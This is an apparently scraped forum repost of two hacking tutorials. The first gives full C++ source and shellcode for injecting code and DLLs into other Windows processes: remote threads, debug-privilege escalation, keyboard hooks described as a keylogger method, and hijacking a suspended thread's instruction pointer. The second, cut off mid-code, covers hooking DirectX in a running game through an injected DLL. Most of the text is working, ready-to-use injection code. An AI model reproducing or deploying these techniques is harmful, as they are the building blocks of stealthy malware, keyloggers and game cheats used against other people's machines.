work without conflicts with the system int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } This code shows that we cannot pass more than 1 parameter to CreateRemoteThread so we need to create a struct (PARAMETERS) and pass it to the remote function I did a tutorial in past for this, check out: http://www.rohitab.c...ion-tutorial-c/ NOTE FOR VISTA/WIN7 CreateRemoteThread() for windows Vista and Windows 7 isn't working because of boundaries, the solution is the undocumented function NtCreateThreadEx(), we can get it from ntdll.dll, and replace CreateRemoteThread() with it in the above code (and remember to adjust the parameters) HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } //so to use in the above code like this: HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress); // // DLL INJECTION Performing Dll injection is much more easier, we don't have to create a struct of parameters beacause LoadLibraryA has only 1 parameter #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> //For Vista/Win7: HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter); using namespace std; DWORD getPid(string procName); int privileges(); int main() { privileges(); //don't mind of the result, because maybe it fails because you already have that privilege DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * dll = "C:\\mydll.dll" //--------now we are ready to inject unsigned long LoadLib = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); LPVOID DataAddress = VirtualAllocEx(p, NULL, strlen(dll) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(p, DataAddress, dll, strlen(dll), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress, 0, NULL); //For Vista/Win7 //HANDLE thread = NtCreateThreadEx(p, (LPTHREAD_START_ROUTINE)LoadLib, DataAddress); if (thread!=0){ //injection completed WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } //for VISTA/WIN7 typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN DWORD StackZeroBits, IN DWORD SizeOfStackCommit, IN DWORD SizeOfStackReserve, OUT LPVOID lpBytesBuffer ); struct NtCreateThreadExBuffer { ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8; }; HANDLE NtCreateThreadEx(HANDLE process, LPTHREAD_START_ROUTINE Start, LPVOID lpParameter){ HMODULE modNtDll = LoadLibrary("ntdll.dll"); if(!modNtDll){ cout<<"Error loading ntdll.dll"<<endl; return 0; } LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx"); if(!funNtCreateThreadEx){ cout<<"Error loading NtCreateThreadEx()"<<endl; return 0; } NtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer)); DWORD temp1 = 0; DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer); ntbuffer.Unknown1 = 0x10003; ntbuffer.Unknown2 = 0x8; ntbuffer.Unknown3 = &temp2; ntbuffer.Unknown4 = 0; ntbuffer.Unknown5 = 0x10004; ntbuffer.Unknown6 = 4; ntbuffer.Unknown7 = &temp1; // ntbuffer.Unknown8 = 0; HANDLE hThread; NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, process, (LPTHREAD_START_ROUTINE) Start, lpParameter, FALSE, //start instantly 0, //null 0, //null 0, //null &ntbuffer ); return hThread; } so if we want to check which OS are we running so to use CreateRemoteThread and NtCreateThreadEx: int CheckOSVersion() { /* * Windows XP = 1 (NT 5.0) * Windows Vista = 2 (NT 6.0) * Windows 7 = 3 (NT 6.1) * Windows 8 = 4 (NT 6.2) --> on Windows 8 CreateRemoteThread works perfectly!! */ OSVERSIONINFO osver; osver.dwOSVersionInfoSize = sizeof(osver); if (GetVersionEx(&osver)) { if (!(osver.dwPlatformId == VER_PLATFORM_WIN32_NT)) return 0; if (osver.dwMajorVersion == 5) return 1; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 0) return 2; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 1) return 3; if (osver.dwMajorVersion == 6 && osver.dwMinorVersion == 2) return 4; } else return 0; } //use: char type[50]; int os = CheckOSVersion(); if (os == 0) return 0; if (os==1) strcpy(type, "Windows XP"); if (os==2) strcpy(type, "Windows Vista"); if (os==3) strcpy(type, "Windows 7"); if (os==4) strcpy(type, "Windows 8"); if you want to check if you are on a 64bit or 32bit OS by code: //the size of void* is the answer if (sizeof(void*) == 4) //is 32bit if (sizeof(void*) == 8) //is 64bit Other way I found many people talking about RtlCreateUserThread(), well it can be implemented easily (it is in ntdll.dll), but has a flaw, if you inject a dll with this function you cannot use CreateThread() inside it but you need to implement RtlCreateUserThread() in the dll too; i don't know why but it is. The implementation is: typedef struct ID{ PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef long (*myRtlCreateUserThread) (HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN, ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID); myRtlCreateUserThread RtlCreateUserThread; RtlCreateUserThread=(myRtlCreateUserThread)GetProcAddress(GetModuleHandle("ntdll.dll"),"RtlCreateUserThread"); IMPORTANT: 32-BIT / 64-BIT This is a portability-injection table: - 32bit program inject 32bit dll in a 32bit target - 32bit program inject 64bit dll in a 64bit target - 64bit program inject 32bit dll in a 32bit target - 64bit program inject 64bit dll in a 64bit target the first type and the fourth type are easy to code, but if you dare getting in troubles with the second and the third take a look at this paper: http://www.corsix.or...ction-and-wow64 2) Code injection with SetWindowsHookEx Setting hooks is a tipical action of keyloggers over WH_KEYBOARD hook type. This method makes them perfect in capturing key strokes BUT if we inject a dll using hooks the program that set the hook must keep running otherwise the dll is suddenly unloaded. To perform this type of injection we don't need directly the PID of the process but the Thread ID of it. We obtain the Thread ID from the PID: DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } Now let's jot down some code about SetWindowsHookEx() #include <cstdlib> #include <iostream> #include "windows.h" #include "tlhelp32.h" using namespace std; DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); int main(int argc, char *argv[]) { HHOOK hproc; HOOKPROC cbt; HMODULE dll = LoadLibrary("DllHook.dll"); //the dll tha we will inject that contains the hook procedure cbt = (HOOKPROC)GetProcAddress(dll, "MyProcedure"); //get the address of our Procedure DWORD id = GetThreadID(getPid("notepad.exe")); //in this example we want to set the hook in a specific target if (id == 0) return 0; //if id == 0 means that the process isn't running hproc = SetWindowsHookEx(WH_KEYBOARD, cbt, dll, id); //if we wanted to set the hook in every process we could replace 'id' with 0 cin.get(); UnhookWindowsHookEx(hproc); //When we want to remove the hook return EXIT_SUCCESS; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } Now the our Dll that contains the hook procedure (in this case is named DllHook.dll) #include <windows.h> #include <stdio.h> #include <stdlib.h> __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp); __declspec(dllexport) LRESULT WINAPI MyProcedure(int code, WPARAM wp, LPARAM lp){ //here goes our code return CallNextHookEx(NULL, code, wp, lp); //this is needed to let other applications set other hooks on this target } BOOL APIENTRY DllMain (HINSTANCE hInst, DWORD reason, LPVOID reserved) { switch (reason) { case DLL_PROCESS_ATTACH: break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } /* Returns TRUE on success, FALSE on failure */ return TRUE; } 3) Code Injection modifying the Main Thread This part is a bit more complicated, but works on any version of WINDOWS and doesn't need to keep the injector running steps: - Open the target Process through the PID (Api used: OpenProcess()) - Allocate space in the remote process for our function and parameters (Api used: VirtualAllocEx()) - Get the target process's thread ID - Open the remote thread and suspend it (Api used: OpenThread() and SupendThread()) - Get the remote thread context (Api used: GetThreadContext()) - Saving the current Eip and setting it to the address of our injected function - Write our function and parameters in the remote process (Api used: WriteProcessMemory()) - PATCH IN RUNTIME the injected function with the addresses of our parameters (Api used: WriteProcessMemory()) - Set the new remote thread context (Api used: SetThreadContext()) - Resume the remote thread and optionally free the memory (Api used: ResumeThread()) Before seeing the code i want to explain what our function will be. It is an assembly code (or shellcode) that performs our operation, but while coding we can't know the addresses of our parameters so we put placeholders, in other words, we put a label that will be replaced during execution with the right addresses. the assembly function is: push 0xACEACEAC ;-> placeholder for the address of our old EIP pushfd ;->save all flags registers pushad ;-> save all registers push 0xACEACEAC ;->placeholder for the address of the string 'User32.dll' mov ecx, 0xACEACEAC ;->placeholder for the address of LoadLibraryA call ecx ;-> traslated in c++: LoadLibrary("User32.dll") ;now the address of the LOADED LIBRARY User32.dll is in eax register push 0xACEACEAC ;->placeholder for the address of the string MessageBoxA push eax ;->push User32.dll into the stack mov edx,0xACEACEAC ;->placeholder for the address of GetProcAddress call edx ;translated in c++: GetProcAddress(LoadLibrary("User32.dll"), "MessageBoxA") ;now the address of MessageBoxA is in eax register push 0 ;push the fourth parameter of MessageBoxA (MB_OK) push 0xACEACEAC ;->placeholder for the address of the text (3 parameter) push 0xACEACEAC ;->placeholder for the address of the caption (2 parameter) push 0 ;push the first parameter into the stack (don't bother) call eax ;translated in c++: MessageBox(0, "caption", "text", MB_OK) popad ;restore all the registers popfd ;restore all the flags ret ;get back to right execution as i said before we can inject an assembly code or shellcode (they behave in the same way), so that assembly code converted in shellcode is: char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb9\xac\xce\xea\xac\xff\xd1\x68\xac\xce\xea\xac\x50\xba\xac\xce\xea\xac\xff\xd2\x6a\x00\x68\xac\xce\xea\xac\x68\xac\xce\xea\xac\x6a\x00\xff\xd0\x61\x9d\xc3"; now lets see the real full code: #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") using namespace std; int privileges(); DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); __declspec() void myFunc(); __declspec() void Useless(); int _tmain() { privileges(); unsigned long oldIP; DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; cout<<pid<<endl; HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * user32 = "User32.dll"; char * MsgBox = "MessageBoxA"; char * testo = "REPORT"; char * mex = "INJECTION THREAD: SUCCESS!"; unsigned long size_myFunc = (unsigned long)Useless - (unsigned long)myFunc; unsigned long GetProcAdr = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetProcAddress"); unsigned long Load32 = (unsigned long)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); void * mexAddress = VirtualAllocEx(p, NULL, strlen(mex)+1, MEM_COMMIT, PAGE_READWRITE); void * testoAddress = VirtualAllocEx(p, NULL, strlen(testo)+1, MEM_COMMIT, PAGE_READWRITE); void * MsgboxAddress = VirtualAllocEx(p, NULL, strlen(MsgBox)+1, MEM_COMMIT, PAGE_READWRITE); void * DataAddress = VirtualAllocEx(p, NULL, strlen(user32)+1, MEM_COMMIT, PAGE_READWRITE); void * MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, DataAddress, user32, strlen(user32), NULL); //string user32.dll WriteProcessMemory(p, MsgboxAddress, MsgBox, strlen(MsgBox), NULL); //string MessageBoxA WriteProcessMemory(p, testoAddress, testo, strlen(testo), NULL); //string for caption WriteProcessMemory(p, mexAddress, mex, strlen(mex), NULL); //string for text DWORD thID = GetThreadID(pid); HANDLE hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID); SuspendThread(hThread); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)MyFuncAddress; ctx.ContextFlags = CONTEXT_CONTROL; WriteProcessMemory(p, MyFuncAddress, myFunc,size_myFunc, NULL); //After writing the function we patch it with the right addresses WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DataAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL); //CARICATO USER32.DLL WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 20), &MsgboxAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 26), &GetProcAdr, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 35), &testoAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 40), &mexAddress, 4, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); Sleep(1000); //wait a second! //if we want to free the used memory and the injected code that will take a short time of execution, //we can of course wait for it for a certain period with Sleep(); //but if the code will keep running with no ending we cannot free the memory otherwise it will crash the target application //VirtualFreeEx(p, MyFuncAddress, size_myFunc, MEM_DECOMMIT); //VirtualFreeEx(p, DataAddress, strlen(mytext)+1, MEM_DECOMMIT); CloseHandle(p); CloseHandle(hThread); system("PAUSE"); return EXIT_SUCCESS; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } __declspec(naked) void myFunc(){ _asm { push 0xACEACEAC pushfd pushad push 0xACEACEAC mov ecx, 0xACEACEAC call ecx push 0xACEACEAC push eax mov edx,0xACEACEAC call edx push 0 push 0xACEACEAC push 0xACEACEAC push 0 call eax popad popfd ret } } __declspec(naked) void Useless(){ //this let's us calculate the address of MyFunc _asm ret; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } Now i want to explain a bit for who didn't understand how to patch the function. Before i stated that i put placeholders that will be replaced with the right addresses, to help you i posted the shellcode that come handy when looking for the offset(position) of the placeholders. take a look at it, we want to patch the first item (oldIP), the placeholder is 0xACEACEAC that translated in hex is "\xac\xce\xea\xac". Now, you need to know that "\xXX" you see is a traslated value, and the first time we meet "\xac\xce\xea\xac" is after 1 "\xXX"... we can consider any "\xXX" such as a posistion, so: . 0 . 1 . 2 . 3 . 4 . 5 . 6 . ... "\x68\xac\xce\xea\xac\x9c\x60 ... so, the beginning address of MyFuncAddress corrisponds to . 0 . ( = \x68 ), and the beginning of the placeholder to . 1 ., so MyFuncAddress + 1... here we write the right address that will replace the first "\xac\xce\xea\xac" if we look for the second we find it in the eighth position so MyFuncAddress + 8... so on until we patch them all. we convent MyFuncAddress from void* to unsigned long so to do an aritmethic sum, then we convert the result back to void* (void*)((unsigned long) MyFuncAddress + each_offset) I noticed that people that use Dev-C++ get an error because it doesn't find OpenThread() and an error with asm tags, well i suggest you to get VisualC++... btw now i show you in a DLL INJECTION how you can get dinamically OpenThread() from kernel32.dll and use the shellcode instead of an asm tags: #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include <tlhelp32.h> #include <shlwapi.h> #pragma comment(lib, "shlwapi.lib") using namespace std; char shellcode[] = "\x68\xac\xce\xea\xac\x9c\x60\x68\xac\xce\xea\xac\xb8\xac\xce\xea\xac\xff\xd0\x61\x9d\xc3"; typedef HANDLE (WINAPI* OpenThreadfunc)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId); OpenThreadfunc myOpenThread; void setOpenThread(); int privileges(); DWORD getPid(string procName); DWORD GetThreadID(DWORD pid); int injectLibrary(char * process, char * dll); HMODULE kernel; int main(int argc, char *argv[]) { injectLibrary("notepad.exe", "C:\\fullpath\\myDll"); system("PAUSE"); return EXIT_SUCCESS; } int injectLibrary(char * process, char * dll){ setOpenThread(); if (myOpenThread == NULL){ cout<<"Error with OpenThread()"<<endl; return 1; } unsigned long oldIP; if (privileges()==1){ //we if you want to check privileges you can, but some times if you are administrator you can perform injection without them cout<<"Error couldn't get privileges..."<<endl; } DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * dllName = dll; unsigned long shsize = sizeof(shellcode); unsigned long Load32 = (unsigned long)GetProcAddress(kernel, "LoadLibraryA"); void * DllAddress = VirtualAllocEx(p, NULL, strlen(dllName)+ 1, MEM_COMMIT,PAGE_READWRITE); void * MyFuncAddress = VirtualAllocEx(p, NULL, shsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, DllAddress, dllName, strlen(dllName), NULL); DWORD thID = GetThreadID(pid); HANDLE hThread = myOpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, thID); SuspendThread(hThread); CONTEXT ctx; ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); oldIP = ctx.Eip; ctx.Eip = (DWORD)MyFuncAddress; ctx.ContextFlags = CONTEXT_CONTROL; WriteProcessMemory(p, MyFuncAddress, &shellcode, shsize, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 1), &oldIP, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 8), &DllAddress, 4, NULL); WriteProcessMemory(p, (void*)((unsigned long)MyFuncAddress + 13), &Load32, 4, NULL); SetThreadContext(hThread, &ctx); ResumeThread(hThread); CloseHandle(p); CloseHandle(hThread); FreeLibrary(kernel); return 0; } void setOpenThread(){ kernel = LoadLibrary("kernel32.dll"); if (kernel != NULL) myOpenThread = (OpenThreadfunc)GetProcAddress(kernel, "OpenThread"); } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } DWORD GetThreadID(DWORD pid){ HANDLE hsnap; THREADENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); pt.dwSize = sizeof(THREADENTRY32); while (Thread32Next(hsnap, &pt)){ if(pt.th32OwnerProcessID == pid){ DWORD Thpid = pt.th32ThreadID; CloseHandle(hsnap); return Thpid; } }; CloseHandle(hsnap); return 0; } int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } WELL, FINISH!! I hope this tutorial will help you! ENJOY CODING! RosDevil Sursa: Code Injections [beginner and advanced] - rohitab.com - Forums

[h=1]Run-time directx hooking using code injection and vtable[/h]Author: [h=3]AnthIste[/h]Okay folks, today I'll be teaching you how to take control of DirectX without the use of MS Detours or somehow hooking Direct3DCreate. You will be able to inject your dll at any time and still have a working hook . This might not be the best way to do it, but it certainly worked for me. It might not work on the specific version of DirectX you have installed, though (More on that later). Even if it doesn't work universally I'm sure there could be a workaround and at least I learnt something (and I would like to share that ) NOTE: I am not an emotionless bastard, but I couldn't post with all my smileys... bleh. DISCLAIMER: Any loss of brain cells reading this long ass tutorial is your own responsibility. Also, the usual, use at your own risk, don't use it to hurt people etc.... Learn something and apply it constructively Required Knowledge / Tools I expect you to have a solid understanding of the following (else following this might be difficult) - Dll injection and possibilities that it creates - X86 Assembly - C++ (especially function pointers) - Simple detours - Debugging with OllyDbg - CheatEngine - DirectX - DirectX SDK Introduction I started this project quite accidentally. I am not aware of any d3d hacks for Warcraft III (or the purpose of having one ) so I thought it could be a challenge to make one. This game dynamically loads d3d8.dll to set up all its Directx related stuff. I'll use this game as an example because even though DirectX8 is old technology the theory still applies to DirectX9 (tested and working). I also think its a pretty pretty popular game so if you have a copy you can whip it out and work with me here . Its also the only game that I have that seems to load the Directx module at runtime which is cool because this system works regardless of that (and what's the fun if its too easy This IS the first tutorial that I've ever written so bear with me As I work through this I'll put some screenies to show what's going on. I guess images don't stay linked forever so I'll put a copy of the disassembly with the picture. Please note that this tutorial will focus a lot on the theory of the process so if you don't understand why certain variables are placed where or need to be told in what source file and between which braces a certain piece of code goes I suggest you learn more C++ and then come back for a second run. Overview of procedure Before I dive right into the action I'll just give a brief overview of what we're going to do here. Don't worry if it doesn't all make sense, I'll go through everything in more detail soon. =PART 1 : Information gathering dll and loader= Make a loader that will spawn the process we are working on (in this case war3.exe) Start it with the CREATE_SUSPENDED flag and inject our dll Resume the process. This dll WILL hook Direct3DCreate8. If we have access to an instance of a IDirect3D8 object we have access to just about everything . Hook CreateDevice using this object's vtable. When createDevice is called we have access to the created IDirect3DDevice8 object (and all its methods via the vtable). We will log all the info that we get here (pointers / addresses of objects and methods, offsets etc) for use in creating the final code. =PART 2 : Final dll= This dll can be injected with anything (eg winject) so I wont go over making a loader for it as well (but the above one will work after a bit of modification I guess). After finding what we were looking for in PART 1 we will do a bit of code injection to steal the address of our d3d device. Use this device to do a vtable hook on any desired d3d methods ------------------- PART 1 : Loader and information gathering --------------------------------- Woohoo time to start coding... We'll start of with the loader. Open up VC++ and create a new empty win32 project. Call it Loader. Add 3 new files: main.cpp inject.h inject.cpp inject.h will just have includes and the definition for our function: // inject.h #ifndef INC_INJECT #define INC_INJECT #include <windows.h> #include <iostream> HMODULE InjectDLL(DWORD ProcessID, char* dllName); #endif inject.cpp will contain our injection function. Im not going to deal with how that works, there are more than enough tutorials on the topic . Credit for this code goes to < bah cant find out whos it is :/, thats not good > // inject.cpp #include "inject.h" HMODULE InjectDLL(DWORD ProcessID, char* dllName) { HANDLE Proc; HANDLE Thread; char buf[50]={0}; LPVOID RemoteString, LoadLibAddy; HMODULE hModule = NULL; DWORD dwOut; if(!ProcessID) return false; Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessID); if(!Proc) { sprintf_s(buf, "OpenProcess() failed: %d", GetLastError()); MessageBoxA(NULL, buf, "Loader", NULL); return false; } LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"); if (!LoadLibAddy) { return false; } RemoteString = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dllName), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE); if (!RemoteString) { return false; } if (!WriteProcessMemory(Proc, (LPVOID)RemoteString, dllName, strlen(dllName), NULL)) { return false; } Thread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddy, (LPVOID)RemoteString, NULL, NULL); if (!Thread) { return false; } else { while(GetExitCodeThread(Thread, &dwOut)) { if(dwOut != STILL_ACTIVE) { hModule = (HMODULE)dwOut; break; } } } CloseHandle(Thread); CloseHandle(Proc); return hModule; } Ok, time to make a loader. Ive tried my best to comment the code that it explains itself but here goes anyway. The loader and the dll will both be placed in the game's directory. We use GetModuleFileName to find the current directory. Append the target executable's name and our dll's name to the path to get the full path for use in injection and CreateProcess. // main.cpp #include <windows.h> #include <iostream> #include "inject.h" const char* EXE_NAME = "war3.exe"; // target executable const char* DLL_NAME = "dll.dll"; // dll to inject int WINAPI WinMain(HINSTANCE 